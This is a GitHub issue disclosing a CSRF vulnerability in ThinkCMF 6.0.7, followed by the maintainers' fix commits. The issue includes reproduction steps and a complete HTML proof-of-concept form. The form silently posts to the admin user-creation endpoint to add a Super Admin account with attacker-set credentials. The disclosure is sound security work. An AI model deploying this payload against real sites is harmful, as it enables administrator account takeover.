Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

I found a CSRF that creates a Super Admin account. #736

Closed
AleDiBen opened this issue Sep 14, 2022 · 0 comments
Closed

I found a CSRF that creates a Super Admin account. #736

AleDiBen opened this issue Sep 14, 2022 · 0 comments
Labels

Comments

@AleDiBen
Copy link

AleDiBen commented Sep 14, 2022

Hi,
I found a CSRF in ThinkCMF version 6.0.7 that allows a remote user to add a Super Admin account by taking advantage of the session of an administrator who is logged into the system. Below are the steps to reproduce this issue.

  1. The remote user tricks the logged in administrator into visiting a malicious site.
  2. The administrator opens the page containing the CSRF payload, injecting the Super Admin user into the site.
  3. The remote user takes control of the site with the credentials he injected.

This is the PoC I used:

<html>
  <body>
  <h1>CSRF - SuperAdmin User Creation</h1>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/user/addpost.html" method="POST">
      <input type="hidden" name="user_login" value="SuperAdmin" />
      <input type="hidden" name="user_pass" value="SuperAdmin999qweasd" />
      <input type="hidden" name="user_email" value="superadmin&#64;yopmail&#46;com" />
      <input type="hidden" name="role_id&#91;&#93;" value="2" />
      <input type="hidden" name="role_id&#91;&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>

Screenshots

SuperAdminOption
Fig. 1: Vulnerable page


CSRFPayload
Fig. 2: CSRF Payload


PayloadExecuted
Fig. 3: CSRF Payload Executed


SuperAdminAdded
Fig. 4: Super Admin account added


SuperAdminLogged
Fig. 5: Super Admin logged in

thinkcmf pushed a commit that referenced this issue Oct 28, 2022
thinkcmf pushed a commit that referenced this issue Oct 28, 2022
* fix github (#736)
* fix github (#737)
* 升级第三方包
* 优化后台验证码逻辑
* !34 update vendor/thinkcmf/cmf-app/src/admin/model/SlideItemModel.php.
* fix #I5MRC5
* phpquery
* Merge branch '6.0' of https://gitee.com/thinkcmf/ThinkCMF into 6.0
* 新增加`cmf_together`函数
* 本站用户页面操作启用,优化提示
* 管理员 添加 时间优化
* 修复语言包
* Merge branch '6.0' of https://gitee.com/thinkcmf/ThinkCMF into 6.0
* 修复幻灯片页面语言包缺失
* 修复github issues #722
* 6.0.8开工
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants